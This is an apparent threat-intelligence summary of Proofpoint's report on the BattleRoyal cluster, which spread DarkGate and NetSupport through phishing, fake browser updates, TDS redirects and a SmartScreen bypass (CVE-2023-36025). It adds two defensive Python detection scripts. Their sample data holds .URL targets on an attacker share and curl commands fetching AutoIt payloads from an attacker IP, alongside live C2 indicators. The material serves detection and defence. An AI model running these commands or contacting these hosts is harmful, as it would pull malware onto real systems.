BattleRoyal, DarkGate Cluster Spreads via Email and Fake Browser Updates | Proofpoint US

Proofpoint tracked a BattleRoyal activity cluster that delivered DarkGate (and later NetSupport) via large-scale email campaigns and browser-based fake updates, using traffic distribution systems (404 TDS, Keitaro TDS) to filter and redirect victims and specially crafted .URL internet shortcut files to bypass Windows SmartScreen (CVE-2023-36025). Campaigns used multi-stage chains (TDS → .URL → VBS → shell commands → AutoIt → DarkGate/NetSupport) targeting users primarily in the US and Canada. #DarkGate #BattleRoyal #CVE-2023-36025 #NetSupport

Keypoints

  • Operators (called BattleRoyal) ran at least 20 email campaigns from Sep–Nov 2023 using GroupIDs like “PLEX” and “ADS5”.
  • Delivery methods combined mass email, malvertising/fake browser updates (RogueRaticate), and compromised sites via 404 and Keitaro TDS.
  • Every campaign used .URL internet shortcut files that exploited CVE-2023-36025 to bypass SmartScreen protections.
  • Typical attack chain: Email link → 404 TDS → Keitaro TDS → .URL → zipped VBS → VBS executes shell commands → curl to download AutoIt interpreter + script → AutoIt runs embedded DarkGate.
  • Observed payloads included DarkGate (AutoIt-embedded) and later a switch to NetSupport RAT; both enable remote access and follow-on activity.
  • Proofpoint published multiple IDS/ETP signatures for WebDAV/.URL retrievals and DarkGate/NetSupport behaviors; notable C2 and hosting indicators were enumerated.

MITRE Techniques

  • [T1566.002] Spearphishing Link – Emails contained redirecting TDS URLs that users clicked to start the chain (‘The emails in this campaign contained: 404 TDS URLs that, if clicked by the user, redirected to Keitaro TDS’).
  • [T1189] Drive-by Compromise – Browser-based fake update (RogueRaticate) delivered payloads via injected requests and steganography on web pages (‘This campaign delivered fake browser update requests to end users on their web browsers that dropped a DarkGate payload’).
  • [T1027.005] Obfuscated Files or Information: Steganography – Malicious code hidden in .css steganography to conceal payload retrieval (‘the threat actor injected a request to a domain they controlled that used .css steganography to conceal the malicious code’).
  • [T1211] Exploitation for Defense Evasion – CVE-2023-36025 is a Windows SmartScreen security-feature bypass, not a code-execution flaw: a specially crafted .URL whose target sits on an SMB or WebDAV share opened with no SmartScreen warning (‘a SmartScreen alert would not be triggered when a .URL points to a SMB or WebDav share…’). Microsoft fixed the bug in the November 2023 security updates.
  • [T1059.005] Command and Scripting Interpreter: Visual Basic and [T1059.003] Windows Command Shell – the VBS dropper spawned cmd.exe to stage the payload, and the downloaded AutoIt script (no dedicated sub-technique; generic T1059) carried the embedded DarkGate (‘The VBS in turn downloaded and executed several shell commands (cmd.exe)… ran an embedded DarkGate’).
  • [T1105] Ingress Tool Transfer – Use of curl.exe and direct HTTP/SMB/WebDAV retrievals to download AutoIt interpreter, scripts, and executables (‘used the curl to download Autoit3.exe… used curl to download and save an AutoIT script’).
  • [T1071.001] Application Layer Protocol: Web Protocols – DarkGate C2 communicated over HTTPS (port 443) for command-and-control (‘DarkGate C2 (DarkGate campaign) 161.35.113[.]58:443’).
  • [T1219] Remote Access Software – Use of NetSupport, a legitimate remote administration tool, to retain remote control of the host for follow-on activity (‘Proofpoint analysts observed the activity cluster replace DarkGate with NetSupport, a legitimate remote access tool’).

Indicators of Compromise

  • [Domains/URLs] TDS and payload hosts – hxxps[:]//heilee[.]com/qxz3l (404 TDS), hxxps[:]//nathumvida[.]org/ (Keitaro TDS), and other TDS/payload domains like zxcdota2huysasi[.]com.
  • [IP Addresses/C2] Command and payload hosts – 161.35.113[.]58:443 (DarkGate C2), 5.181.159[.]29 (hosting .URL targets/downloader).
  • [File hashes (SHA256)] Samples used in chains – 96ca146b6bb95de35f61289c2725f979a2957ce54761aff5f37726a85f2f9e77 (IN-SEPT-8415-8794132.pdf.url), e2a8a53e117f1dda2c09e5b83a13c99b848873a75b14d20823318840e84de243 (bye.vbs), and other hashes listed.
  • [File names] Staged artifacts – bye.vbs (zipped VBS downloader), Autoit3.exe (AutoIt interpreter), evervendor.exe (NetSupport payload), and .URL files like pr-nv28-2023.url.

The technical procedure used by the BattleRoyal cluster relies on multi-stage web redirectors and internet shortcut (.URL) abuse to get around SmartScreen. Initial lures (mass phishing links or injected fake browser-update prompts) pointed victims to 404/Keitaro TDS domains, which filtered visitors and served .URL files. When the user opened the .URL, its target was a file on an attacker-controlled SMB or WebDAV share (a file:// or UNC path) rather than a web URL; on unpatched Windows that is exactly the case in which SmartScreen raised no warning (CVE-2023-36025), so the ZIP containing the VBS downloader was fetched and opened without the usual prompt.
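The following triage script is an added example, not Proofpoint's tooling or anything from the original post. It parses the INI-style body of a .URL file and flags the condition that CVE-2023-36025 turned into a silent open: a target on a remote SMB or WebDAV host (file:// with a host, or a UNC path, including the WebDAV @SSL/@port forms), plus the document-style double extension seen in the lure names. The lure file names and the 5.181.159[.]29 host come from the IOC list above; every share path, the benign samples and the rule names are constructed for the demo.

```python
"""Triage Windows Internet Shortcut (.url) files for the CVE-2023-36025 pattern.

Added example, not Proofpoint's tooling. Lure file names and the host come from
the IOC list above; share paths and the benign samples are constructed.
"""
import configparser
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlsplit

# \\host\share, \\host@80\DavWWWRoot\..., \\host@SSL@443\... (WebDAV mini-redirector forms)
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@(?:SSL|\d+))*\\", re.IGNORECASE)
LOCAL_HOSTS = {"", "localhost", "127.0.0.1", "::1"}
# a .url pretending to be a document, e.g. IN-SEPT-8415-8794132.pdf.url
DOUBLE_EXT_RE = re.compile(r"\.(pdf|docx?|xlsx?|txt|png|jpe?g)\.url$", re.IGNORECASE)
ARCHIVE_OR_SCRIPT_RE = re.compile(r"\.(zip|vbs|js|lnk|exe|dll|msi)$", re.IGNORECASE)


@dataclass
class Finding:
    filename: str
    target: str
    remote_host: Optional[str]
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def remote_share_host(target: str) -> Optional[str]:
    """Return the host if the target resolves over SMB/WebDAV, else None.

    file:// and UNC targets on a remote host are the case in which an
    unpatched SmartScreen showed no warning (CVE-2023-36025). http(s)
    targets just open the browser and are not the bypass.
    """
    m = UNC_RE.match(target)
    if m:
        host = m.group(1).lower()
    else:
        parts = urlsplit(target)
        if parts.scheme.lower() != "file":
            return None
        host = parts.netloc.split("@")[0].lower()   # drop @SSL / @port WebDAV decorations
    return None if host in LOCAL_HOSTS else host


def analyze_url_shortcut(filename: str, content: str) -> Finding:
    """Parse the INI-style .url body and collect reasons to treat it as hostile."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(content.lstrip("\ufeff"))          # tolerate a UTF-8 BOM
    target = cp.get("InternetShortcut", "URL", fallback="").strip()
    host = remote_share_host(target)
    reasons: List[str] = []
    if host is not None:
        reasons.append(f"target is on remote SMB/WebDAV host {host} (CVE-2023-36025 bypass condition)")
        if ARCHIVE_OR_SCRIPT_RE.search(target.split("?")[0]):
            reasons.append("remote target is an archive or script rather than a document")
    if DOUBLE_EXT_RE.search(filename):
        reasons.append("document-style double extension hides the .url suffix")
    return Finding(filename, target, host, reasons)


# Constructed samples: file names from the IOC list, paths and benign entries invented.
SAMPLES = {
    "IN-SEPT-8415-8794132.pdf.url":
        "[InternetShortcut]\r\nURL=file://5.181.159.29/share/IN-SEPT-8415.zip\r\nIconIndex=13\r\n",
    "pr-nv28-2023.url":
        "[InternetShortcut]\r\nURL=\\\\5.181.159.29@80\\DavWWWRoot\\pr-nv28-2023.zip\r\n",
    "Proofpoint.url":
        "[InternetShortcut]\r\nURL=https://www.proofpoint.com/\r\n",
    "notes.url":
        "[InternetShortcut]\r\nURL=file:///C:/Users/victim/Documents/notes.txt\r\n",
}


def triage_samples() -> List[Finding]:
    return [analyze_url_shortcut(name, body) for name, body in SAMPLES.items()]


if __name__ == "__main__":
    for f in triage_samples():
        print(f"{'SUSPICIOUS' if f.suspicious else 'ok':10} {f.filename} -> {f.target}")
        for r in f.reasons:
            print(f"             - {r}")
```

Point `analyze_url_shortcut` at the bytes of any quarantined .url (mail gateway, ZIP extraction, endpoint quarantine) rather than at the file on disk; a remote-share target is worth an alert on its own, regardless of whether the host is patched, because it is not something a legitimate shortcut mailed to a user ever needs.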

Once executed, the VBS invoked cmd.exe to create a staging directory and call the curl.exe already present on the system to fetch an AutoIt interpreter (Autoit3.exe) and one or more AutoIt scripts. The AutoIt script decoded and ran an embedded DarkGate loader (or, in later campaigns, a NetSupport executable), completing ingress tool transfer and establishing C2 over HTTPS (e.g., 161.35.113[.]58:443). The chain frequently included multiple .URL hops (one .URL retrieving another) and TDS-based filtering to keep researchers and sandboxes away from the payload.

Operationally, the actor used CSS steganography on compromised web pages to hide the code that called out to Keitaro-filtered infrastructure (RogueRaticate) and relied on AutoIt-based loaders to hinder detection and analysis. Because the SmartScreen bypass removes the one prompt a user would normally see, detection has to rest on telemetry: prioritize .URL files and downloads whose targets are WebDAV/SMB shares, wscript/cscript-rooted process trees in which cmd.exe spawns curl.exe and Autoit3.exe, and outbound connections to the C2 hosts and TDS domains listed in the IOCs above. Microsoft fixed CVE-2023-36025 in the November 2023 Windows security updates, so an unpatched fleet is the first thing to check.
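The detection below is an added example written for this summary; it is not one of Proofpoint's published signatures. It walks a small set of Sysmon-style process and network events and raises the three behaviours the chain above produces: curl.exe running beneath a wscript/cscript ancestor (worse when it stages Autoit3.exe or a .au3), Autoit3.exe running a script inside that same VBS-rooted tree, and any process connecting to the DarkGate C2 address from the IOC list. The event layout, pids, command lines and download URLs are constructed; bye.vbs, Autoit3.exe and 161.35.113[.]58:443 are taken from the IOCs above, and reusing 5.181.159[.]29 as the download host is an assumption for the demo.

```python
"""Hunt for the BattleRoyal execution chain in process/network telemetry.

Added example, not Proofpoint's signatures. Field layout, pids, paths and
URLs are constructed; file names and the C2 address come from the IOC list.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
KNOWN_C2 = {("161.35.113.58", 443)}          # DarkGate C2 from the IOC list


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str       # executable basename, lower-case
    cmdline: str


@dataclass
class NetEvent:
    pid: int
    dest_ip: str
    dest_port: int


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Images of the parent, grandparent, ... of pid (cycle-safe)."""
    chain: List[str] = []
    seen = set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
        if cur is not None:
            chain.append(cur.image)
    return chain


def detect_darkgate_chain(procs: List[ProcEvent], nets: List[NetEvent]) -> List[Alert]:
    by_pid = {p.pid: p for p in procs}
    alerts: List[Alert] = []
    for p in procs:
        parents = ancestry(p.pid, by_pid)
        under_script_host = any(img in SCRIPT_HOSTS for img in parents)
        cmd = p.cmdline.lower()
        # VBS -> cmd.exe -> curl.exe: script-driven download, worse if it stages AutoIt
        if p.image == "curl.exe" and under_script_host:
            what = "AutoIt interpreter/script" if ("autoit3" in cmd or ".au3" in cmd) else "file"
            alerts.append(Alert("curl_from_script_host", p.pid,
                                f"curl downloading {what} beneath {' <- '.join(parents)}"))
        # AutoIt interpreter executing a script inside the same VBS-rooted tree
        if p.image == "autoit3.exe" and under_script_host and ".au3" in cmd:
            alerts.append(Alert("autoit_from_script_chain", p.pid, p.cmdline))
    for n in nets:
        if (n.dest_ip, n.dest_port) in KNOWN_C2:
            image = by_pid[n.pid].image if n.pid in by_pid else "unknown"
            alerts.append(Alert("known_c2_connection", n.pid,
                                f"{image} -> {n.dest_ip}:{n.dest_port}"))
    return alerts


def sample_telemetry() -> Tuple[List[ProcEvent], List[NetEvent]]:
    """Constructed events mirroring the chain in the text; paths and URLs are invented."""
    stage = r"C:\ProgramData\stage"
    procs = [
        ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
        ProcEvent(200, 100, "wscript.exe", r'wscript.exe "C:\Users\victim\AppData\Local\Temp\bye.vbs"'),
        ProcEvent(300, 200, "cmd.exe", f"cmd.exe /c mkdir {stage} & cd {stage}"),
        ProcEvent(301, 300, "curl.exe", f"curl -o {stage}\\Autoit3.exe http://5.181.159.29/Autoit3.exe"),
        ProcEvent(302, 300, "curl.exe", f"curl -o {stage}\\script.au3 http://5.181.159.29/script.au3"),
        ProcEvent(400, 300, "autoit3.exe", f"{stage}\\Autoit3.exe {stage}\\script.au3"),
        ProcEvent(500, 100, "curl.exe", "curl https://www.proofpoint.com/"),  # benign: no script host above
    ]
    nets = [NetEvent(400, "161.35.113.58", 443), NetEvent(500, "203.0.113.10", 443)]
    return procs, nets


if __name__ == "__main__":
    for a in detect_darkgate_chain(*sample_telemetry()):
        print(f"[{a.rule}] pid={a.pid}: {a.detail}")
```

The ancestry walk is what keeps the rule useful: a user running curl from a shell (pid 500 in the sample) is never flagged, while the same binary two levels below wscript.exe is, even though the command lines look alike. Feed real Sysmon event ID 1 and 3 records into `ProcEvent`/`NetEvent` and replace `KNOWN_C2` with the current indicator list.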

Read more: https://www.proofpoint.com/us/blog/threat-insight/battleroyal-darkgate-cluster-spreads-email-and-fake-browser-updates